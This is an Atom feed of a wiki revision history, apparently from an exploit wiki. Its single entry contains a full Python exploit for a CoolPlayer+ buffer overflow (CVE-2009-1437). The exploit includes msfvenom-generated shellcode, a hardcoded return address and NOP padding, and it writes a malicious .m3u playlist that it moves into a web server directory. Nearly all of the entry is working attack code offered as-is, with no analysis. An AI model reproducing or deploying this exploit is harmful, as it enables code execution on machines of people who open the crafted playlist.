<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2009-1437_PortableApps_CoolPlayer_Portable%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2009-1437 PortableApps CoolPlayer Portable緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2009-1437_PortableApps_CoolPlayer_Portable%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2009-1437_PortableApps_CoolPlayer_Portable%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T16:48:08Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2009-1437_PortableApps_CoolPlayer_Portable%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=895&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; #!/usr/bin/python &quot;&quot;&quot;  Content:	Exploit coolplayer+ &lt;= 2.19.6 Author: 	Florian Hansemann | @HanseSecure | https://hansesecure.de Date: 		02/2018  Related		Vulner...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2009-1437_PortableApps_CoolPlayer_Portable%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=895&amp;oldid=prev"/>
		<updated>2021-04-02T03:59:19Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; #!/usr/bin/python &amp;quot;&amp;quot;&amp;quot;  Content:	Exploit coolplayer+ &amp;lt;= 2.19.6 Author: 	Florian Hansemann | @HanseSecure | https://hansesecure.de Date: 		02/2018  Related		Vulner...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot; &lt;br /&gt;
Content:	Exploit coolplayer+ &amp;lt;= 2.19.6&lt;br /&gt;
Author: 	Florian Hansemann | @HanseSecure | https://hansesecure.de&lt;br /&gt;
Date: 		02/2018&lt;br /&gt;
&lt;br /&gt;
Related		Vulnerability:	CVE-2009-1437 &amp;amp;&amp;amp; Exploit https://www.exploit-db.com/exploits/8519/&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
import sys&lt;br /&gt;
from subprocess import call&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
RET address:&lt;br /&gt;
00402C77&lt;br /&gt;
Converted reverseHex value:&lt;br /&gt;
\x77\x2C\x40\x00&lt;br /&gt;
&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
#msfvenom -p windows/messagebox TEXT=&amp;quot;Owned by @HanseSecure&amp;quot; -f python&lt;br /&gt;
&lt;br /&gt;
buf =  &amp;quot;&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56&amp;quot;&lt;br /&gt;
buf += &amp;quot;\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x24\x0a\x89\xe3\x68\x65\x58\x20\x20\x68\x65\x63\x75&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x72\x68\x6e\x73\x65\x53\x68\x20\x40\x48\x61\x68\x64&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x20\x62\x79\x68\x4f\x77\x6e\x65\x31\xc9\x88\x4c\x24&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x15\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0\x31\xc0&amp;quot;&lt;br /&gt;
buf += &amp;quot;\x50\xff\x55\x08&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ret = &amp;quot;\x77\x2C\x40\x00&amp;quot;&lt;br /&gt;
jmp = &amp;quot;\xeb\x1e&amp;quot;&lt;br /&gt;
&lt;br /&gt;
buffer = &amp;quot;\x90&amp;quot;*230 + jmp + &amp;quot;\x90&amp;quot;*2 + ret + &amp;quot;\x90&amp;quot;*50 + buf + &amp;quot;A&amp;quot;*(4000-234-4-50-len(buf))&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;[+] Creating malicious file&amp;quot;&lt;br /&gt;
file = open(&amp;quot;test&amp;quot;,&amp;quot;w&amp;quot;)&lt;br /&gt;
file.write(buffer)&lt;br /&gt;
file.close()&lt;br /&gt;
call(['mv test /var/www/html/test.m3u'], shell=True)&lt;br /&gt;
print &amp;quot;[+] File created and moved to webspace successfully&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>